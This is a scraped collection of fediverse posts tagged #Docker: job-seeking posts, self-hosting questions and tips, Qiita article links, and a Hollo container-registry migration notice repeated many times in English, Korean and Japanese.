Discussions: https://discu.eu/q/http://focus4k.com

#devops #docker

h/t @catsalad

#k8s #Kubernetes #Docker #Containers #OCI #DevOps #PlatformEngineering

Hallo,

ich suche zur Zeit einen #Job als #Softwareentwickler im Raum #Potsdam oder #Remote
Ich bin Diplom- #Informatik-er mit 12 Jahren Berufserfahrung.
Bisher arbeitete ich mit
#Cpp
#Csharp
#Javascript
#Typescript
#CSS
#HTML
#Java
#Python
#Angular & #Ionic
#MFC, #WindowsForms & #WPF
…
Auch #Docker, Gitlab-#Pipelines oder Azure DevOps sind mir nicht fremd. Ich bewegte mich bisher auf #Windows, #Linux, und auch ein wenig auf MacOS.

Irgendwo anzukommen und mich in einem konstruktiven Umfeld einzubringen, fände ich sehr schön.

Ich arbeite mich gerne in neue Felder ein, so würde mich unter Anderem die Embedded-Entwicklung interessieren, aber auch Sprachen wie Rust.

Ich spreche mich gern im Team ab oder lasse mich durch Kollegen in meiner Arbeit inspirieren, und bringe gerne meine Erfahrungen ein.

Auf Anfrage mit ein paar Informationen schicke ich gerne eine Bewerbung oder Ähnliches.

Vielleicht findet sich ja etwas über diese Plattform.

Vielen Dank.

Hallo,

ich suche zur Zeit einen #Job als #Softwareentwickler im Raum #Potsdam oder #Remote
Ich bin Diplom- #Informatik-er mit 12 Jahren Berufserfahrung.
Bisher arbeitete ich mit
#Cpp
#Csharp
#Javascript
#Typescript
#CSS
#HTML
#Java
#Python
#Angular & #Ionic
#MFC, #WindowsForms & #WPF
…
Auch #Docker, Gitlab-#Pipelines oder Azure DevOps sind mir nicht fremd. Ich bewegte mich bisher auf #Windows, #Linux, und auch ein wenig auf MacOS.

Irgendwo anzukommen und mich in einem konstruktiven Umfeld einzubringen, fände ich sehr schön.

Ich arbeite mich gerne in neue Felder ein, so würde mich unter Anderem die Embedded-Entwicklung interessieren, aber auch Sprachen wie Rust.

Ich spreche mich gern im Team ab oder lasse mich durch Kollegen in meiner Arbeit inspirieren, und bringe gerne meine Erfahrungen ein.

Auf Anfrage mit ein paar Informationen schicke ich gerne eine Bewerbung oder Ähnliches.

Vielleicht findet sich ja etwas über diese Plattform.

Vielen Dank.

This is such a clever and handy thing...

https://nixery.dev/

#Nix #NixPkgs #Docker #Containers #OCI #DevOps #PlatformEngineering

If #PhanpySocial were a native mobile app, it would dominate the #Fediverse client segment. Hats off. This is really fine work.

If you’re into #selfHosting, #docker, etc you will find it absurdly easy to deploy. Or just use the flagship instance at https://phanpy.social/

Thanks again, @cheeaun !!

コンテナ間通信でハマった話
https://qiita.com/kokeriback0872/items/888eadf39b312126137d?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #Go #Docker #React #docker_compose

aaaaaand.... as a developer, after a while, I feel safe to say that #OsX is far worse than #Linux but far better than #Windows ... just realizing how much working with #KDE and without any mid-vm (yeah #Docker, I'm talking to you) was satisfying

How many projects or CI stacks, critical or not, in production or not, rely on some Dockerfile starting with "FROM alpine:xxx" ?

https://alpinelinux.org/posts/Seeking-Support-After-Equinix-Metal-Sunsets.html

#alpinelinux #docker #CI #dev #webdev #saas #programming #devops

Ya love to see this stuff

https://github.com/jpetazzo/registrish

@jpetazzo nice hacking

#Docker #OCI #Containers #PlatformEngineering #DevOps

How many projects or CI stacks, critical or not, in production or not, rely on some Dockerfile starting with "FROM alpine:xxx" ?

https://alpinelinux.org/posts/Seeking-Support-After-Equinix-Metal-Sunsets.html

#alpinelinux #docker #CI #dev #webdev #saas #programming #devops

New blog post! Come figure out how I have configured my Forgejo runners to build my container images on my Raspberry Pi, totally self-hosted and private. I went crazy and run Docker in Docker in Docker in ... (you got the idea). There is also a bonus LXC container with Proxmox and a sprinkle of Ansible. This was a fun experiment, and I hope you enjoy it!

#HomeLab #SelfHosted #Forgejo #RaspberryPi #Docker #Proxmox #SysAdminLife #Blog

https://mteixeira.wordpress.com/2025/02/03/my-self-hosted-forgejo-runner-setup/

Devcontainerを使ってDjangoの環境構築をしよう!
https://qiita.com/ooyy0121/items/be58d39f277f1a7a9f63?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #Python #Django #Docker #初学者向け #プログラミング初心者

For those that #selfhost and have a #homelab and use something like a #minipc for #proxmox, #docker and other small projects e.g. #PiHole, Bluesky, Mastodon, VPN server, #Nextcloud, what hardware would you recommend? Budget around AUD4-500 (USD250-300), dual-NIC in case I do something routery with it later, doesn't need any wireless connectivity, not going to be connected to monitors or do any media serving/transcoding, won't be a NAS (but I reckon 512GB storage is minimum), power and noise not a problem as it'll be in a comms rack in garage (but would prefer not some huge 2U ProLiant or whatever just so it doesn't wrench it off the wall. I don't mind having "last year's" spec, or considering a refurbed SFF desktop I can load with RAM, storage and NICs.

aaaaaand.... as a developer, after a while, I feel safe to say that #OsX is far worse than #Linux but far better than #Windows ... just realizing how much working with #KDE and without any mid-vm (yeah #Docker, I'm talking to you) was satisfying

Wrote about how to setup @pixelfed on #docker / #container https://kushaldas.in/posts/pixelfed-on-docker.html #photography #fediverse #pixelfed

You can follow my account at @kushal@pixel.kushaldas.photography

Okay, here's something that is killing my Forgejo runner experiment: I need the perfect container image. The ones I have tried so far are missing one thing or another, and it's taking me a while to deal with that.

So, instead of trying to build my own image, let me ask the hive mind if anyone knows of a single *reliable* container image that has all of the following *already* installed: Python, NodeJS and Docker CE (or Podman).

And no, I'm not looking for a container image built buy a random guy for their own personal use. That guy could be me. I really want something that is supported as part of a larger project.

My sanity thanks you.

#HomeLab #Forgejo #SysAdminLife #SelfHosted #Docker #Podman

Has anyone used the Mitra Docker image: https://hub.docker.com/r/bleakfuture0/mitra ? If so is there any documentation, for example file system and port mappings and/or example Docker files ?

#mitra #mitraweb #docker #askfediverse #fediverse

Hi!

I'm Adrian, a FullStack #Developer looking for a job either in #Québec (or from it if you allow for remote work), with a permanent and open visa

I have experience building and maintaining web apps and APIs, designing systems, doing #DevOps and a bit of #BigData, #MachineLearning and #IoT

I'm experienced using #Elixir, #Phoenix, #LiveView, #NodeJS, #TypeScript, #Fastify, #Express and #Python ; and on the DevOps side in CI/CD pipelines (either #GithubActions and Gitlab CI/CD), #Docker and a bit of #Kubernetes

I was tasked with a lot of the #innovation happening in my previous company, researching tools, librairies, patterns or general technologies either for our own #DeveloperExperience or for our products

I also wrote a lot of technical and non technical documentation and internal presentations, and even participated in a few meetups. You can read some of my writing on my blog: https://blog.adrianc.eu

You might also have seen me on a few Elixir-related Discord servers, or even Bluesky (@adrianc.eu) and Twitter ; either sharing tech news, helping people, reading in book clubs or just chatting

I’m open to full-time right now, contracting work can be discussed.

I'm looking for any developer position, not only #ElixirLang, even though it represents most of my experience. And if the technology you're using isn't on my resume, give me a chance! I'm a fast learner and I might anyway have studied it in class :P

DM me for more info, like github link, my resume or anything :)

Boosts, responses and DM welcome, of course!

#MyElixirStatus #FediJobs #FediJob #FediGetHired #OpenToWork

Hi!

I'm Adrian, a FullStack #Developer looking for a job either in #Québec (or from it if you allow for remote work), with a permanent and open visa

I have experience building and maintaining web apps and APIs, designing systems, doing #DevOps and a bit of #BigData, #MachineLearning and #IoT

I'm experienced using #Elixir, #Phoenix, #LiveView, #NodeJS, #TypeScript, #Fastify, #Express and #Python ; and on the DevOps side in CI/CD pipelines (either #GithubActions and Gitlab CI/CD), #Docker and a bit of #Kubernetes

I was tasked with a lot of the #innovation happening in my previous company, researching tools, librairies, patterns or general technologies either for our own #DeveloperExperience or for our products

I also wrote a lot of technical and non technical documentation and internal presentations, and even participated in a few meetups. You can read some of my writing on my blog: https://blog.adrianc.eu

You might also have seen me on a few Elixir-related Discord servers, or even Bluesky (@adrianc.eu) and Twitter ; either sharing tech news, helping people, reading in book clubs or just chatting

I’m open to full-time right now, contracting work can be discussed.

I'm looking for any developer position, not only #ElixirLang, even though it represents most of my experience. And if the technology you're using isn't on my resume, give me a chance! I'm a fast learner and I might anyway have studied it in class :P

DM me for more info, like github link, my resume or anything :)

Boosts, responses and DM welcome, of course!

#MyElixirStatus #FediJobs #FediJob #FediGetHired #OpenToWork

macOS now identifies Docker as Malware

https://github.com/docker/for-mac/issues/7520

Discussions: https://discu.eu/q/https://github.com/docker/for-mac/issues/7520

#devops #docker

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Sharing an important update about #Hollo: we've moved our repository to a new home! If you're using Hollo with #Docker, please check this announcement:

https://hollo.social/@hollo/0194aa78-bf56-7559-bf64-e9e1c09a69bd

The #Hollo repository has moved from @dahlia/hollo to @fedify-dev/hollo! Along with this move, our #Docker image registry has also been relocated from ghcr.io/dahlia/hollo to ghcr.io/fedify-dev/hollo.

While the old image registry will remain accessible, it won't receive any new tags. We recommend all Hollo users to update their Docker image references to the new registry address.

To update your Docker configurations, please change:

• From: ghcr.io/dahlia/hollo:latest
• To: ghcr.io/fedify-dev/hollo:latest

The migration ensures better project organization and continued development. Thank you for your understanding and cooperation in making this transition smooth!

#fediverse

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

The #Hollo repository has moved from @dahlia/hollo to @fedify-dev/hollo! Along with this move, our #Docker image registry has also been relocated from ghcr.io/dahlia/hollo to ghcr.io/fedify-dev/hollo.

While the old image registry will remain accessible, it won't receive any new tags. We recommend all Hollo users to update their Docker image references to the new registry address.

To update your Docker configurations, please change:

• From: ghcr.io/dahlia/hollo:latest
• To: ghcr.io/fedify-dev/hollo:latest

The migration ensures better project organization and continued development. Thank you for your understanding and cooperation in making this transition smooth!

#fediverse

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

The #Hollo repository has moved from @dahlia/hollo to @fedify-dev/hollo! Along with this move, our #Docker image registry has also been relocated from ghcr.io/dahlia/hollo to ghcr.io/fedify-dev/hollo.

While the old image registry will remain accessible, it won't receive any new tags. We recommend all Hollo users to update their Docker image references to the new registry address.

To update your Docker configurations, please change:

• From: ghcr.io/dahlia/hollo:latest
• To: ghcr.io/fedify-dev/hollo:latest

The migration ensures better project organization and continued development. Thank you for your understanding and cooperation in making this transition smooth!

#fediverse

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Sharing an important update about #Hollo: we've moved our repository to a new home! If you're using Hollo with #Docker, please check this announcement:

https://hollo.social/@hollo/0194aa78-bf56-7559-bf64-e9e1c09a69bd

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

The #Hollo repository has moved from @dahlia/hollo to @fedify-dev/hollo! Along with this move, our #Docker image registry has also been relocated from ghcr.io/dahlia/hollo to ghcr.io/fedify-dev/hollo.

While the old image registry will remain accessible, it won't receive any new tags. We recommend all Hollo users to update their Docker image references to the new registry address.

To update your Docker configurations, please change:

• From: ghcr.io/dahlia/hollo:latest
• To: ghcr.io/fedify-dev/hollo:latest

The migration ensures better project organization and continued development. Thank you for your understanding and cooperation in making this transition smooth!

#fediverse

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

#Hollo 關聯(관련) 重要(중요) 消息(소식)을 共有(공유)합니다. 貯藏所(저장소)가 새로운 곳으로 移徙(이사)했어요! #Docker 이미지로 使用中(사용중)이신 분들은 確認(확인) 付託(부탁)드립니다:

https://hollo.social/@hollo/0194aa7b-017e-74e7-b97a-f91bb6c7b8e6

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

#Hollo 關聯(관련) 重要(중요) 消息(소식)을 共有(공유)합니다. 貯藏所(저장소)가 새로운 곳으로 移徙(이사)했어요! #Docker 이미지로 使用中(사용중)이신 분들은 確認(확인) 付託(부탁)드립니다:

https://hollo.social/@hollo/0194aa7b-017e-74e7-b97a-f91bb6c7b8e6

The #Hollo repository has moved from @dahlia/hollo to @fedify-dev/hollo! Along with this move, our #Docker image registry has also been relocated from ghcr.io/dahlia/hollo to ghcr.io/fedify-dev/hollo.

While the old image registry will remain accessible, it won't receive any new tags. We recommend all Hollo users to update their Docker image references to the new registry address.

To update your Docker configurations, please change:

• From: ghcr.io/dahlia/hollo:latest
• To: ghcr.io/fedify-dev/hollo:latest

The migration ensures better project organization and continued development. Thank you for your understanding and cooperation in making this transition smooth!

#fediverse

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Sharing an important update about #Hollo: we've moved our repository to a new home! If you're using Hollo with #Docker, please check this announcement:

https://hollo.social/@hollo/0194aa78-bf56-7559-bf64-e9e1c09a69bd

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Sharing an important update about #Hollo: we've moved our repository to a new home! If you're using Hollo with #Docker, please check this announcement:

https://hollo.social/@hollo/0194aa78-bf56-7559-bf64-e9e1c09a69bd

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

The #Hollo repository has moved from @dahlia/hollo to @fedify-dev/hollo! Along with this move, our #Docker image registry has also been relocated from ghcr.io/dahlia/hollo to ghcr.io/fedify-dev/hollo.

While the old image registry will remain accessible, it won't receive any new tags. We recommend all Hollo users to update their Docker image references to the new registry address.

To update your Docker configurations, please change:

• From: ghcr.io/dahlia/hollo:latest
• To: ghcr.io/fedify-dev/hollo:latest

The migration ensures better project organization and continued development. Thank you for your understanding and cooperation in making this transition smooth!

#fediverse

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

#Hollo 저장소가 @dahlia/hollo에서 @fedify-dev/hollo로 이전되었습니다. 이에 따라 #Docker 이미지 레지스트리도 ghcr.io/dahlia/hollo에서 ghcr.io/fedify-dev/hollo로 이전되었습니다.

기존 이미지 레지스트리는 계속 접근 가능하지만, 새로운 태그는 더 이상 추가되지 않을 예정입니다. Hollo를 사용 중이신 모든 분들은 새로운 레지스트리 주소로 업데이트해 주시기 바랍니다.

Docker 설정을 다음과 같이 변경해 주세요:

• 기존 이미지 주소: ghcr.io/dahlia/hollo:latest
• 새 이미지 주소: ghcr.io/fedify-dev/hollo:latest

이번 이전은 프로젝트의 더 나은 운영과 지속적인 개발을 위해 진행되었습니다. 원활한 전환에 협조해 주셔서 감사합니다.

#fediverse #페디버스 #연합우주 #도커

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

Holloのリポジトリが@dahlia/holloから@fedify-dev/holloに移行いたしました。これに伴い、Dockerイメージレジストリもghcr.io/dahlia/holloからghcr.io/fedify-dev/holloに移行しております。

旧イメージレジストリは引き続きアクセス可能ですが、新しいタグの追加は行われません。Holloをご利用の皆様には、新しいレジストリアドレスへの更新をお願いいたします。

Dockerの設定を以下のように更新してください：

• 旧アドレス：ghcr.io/dahlia/hollo:latest
• 新アドレス：ghcr.io/fedify-dev/hollo:latest

この移行はプロジェクトのより良い運営と継続的な開発のために行われました。円滑な移行にご協力いただき、誠にありがとうございます。

#Hollo #fediverse #フェディバース #Docker #ドッカー

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

The #Hollo repository has moved from @dahlia/hollo to @fedify-dev/hollo! Along with this move, our #Docker image registry has also been relocated from ghcr.io/dahlia/hollo to ghcr.io/fedify-dev/hollo.

While the old image registry will remain accessible, it won't receive any new tags. We recommend all Hollo users to update their Docker image references to the new registry address.

To update your Docker configurations, please change:

• From: ghcr.io/dahlia/hollo:latest
• To: ghcr.io/fedify-dev/hollo:latest

The migration ensures better project organization and continued development. Thank you for your understanding and cooperation in making this transition smooth!

#fediverse

https://hollo.social/@fedify/0194a851-581d-779c-b777-dc39e753ef14

【🪙中級者向け】改めてDockerを深ぼる① ~ 仮想化の歴史について ~
https://qiita.com/ikemura-ren/items/b24d9eb497acfa48486a?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #vmware #Docker #仮想化 #歴史 #container

Use locally installed fonts in the LaTeX Docker container by mounting your fonts directory to /usr/local/share/fonts, e.g.

docker --volume=/usr/share/fonts:/usr/local/share/fonts pandoc/latex …

Should work with XeLaTeX and LuaLaTeX PDF engines as well as with the "typst" container.

#pandoc #TeXLaTeX #typst #fonts #docker

🚀 Dive 0.14.0 has just been released with support for zstd compression in container image layers.

Thanks to Steven Halaka for contributing this feature!

> Dive is a tool for exploring each layer in a Docker image.

🐳 https://github.com/joschi/dive/releases/tag/v0.14.0

#docker #oci #containers

[rails] tailwindインストール時にexit code 127が出た時の対処法 [tailwind]
https://qiita.com/YamzknA/items/53478370761f716b068f?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #Ruby #Rails #Docker #tailwindcss

I've had a bit more of a poke at this now, the Dockerfile is installing a bunch of services and they're running when the container does.

Nothing's really integrated and talking to itself yet, that's the next step...

I got a little sidetracked by the fact that Pixelfed ships with its own docker-compose.yml but I can't figure out how to make sense of it.

https://codeberg.org/diffrentcolours/pixelfed_aio is where I've got to so far. Feel free to have a poke around, make improvements, or let me know what I've done wrong.

#PixelFed #Docker #SelfHosting

Standing up @nodebb on #Docker with #MongoDB.

A little while ago I was discussing with @raf the things I am looking for in online interaction that I'm not getting from traditional or federated social media. A lot of different things came up, but the most important and central is this:
the need to be able to have deep, complex conversations with people I trust, in a way that those conversations are not ephemeral, lost in the endlessly scrolling feed, like an infinite dark plain in which attention is but a circle of candlelight—but permanent, archived, accessible.

This is because I want to be able to collaborate with people to create ideas, with complexity and nuance, for which it's necessary to be able to build on the past and plan for the future.

What suggested itself was an Internet forum.

https://marctrius.net/deploying-nodebb-on-docker-with-mongodb/

#SelfHosting #Forum #Docker #VPS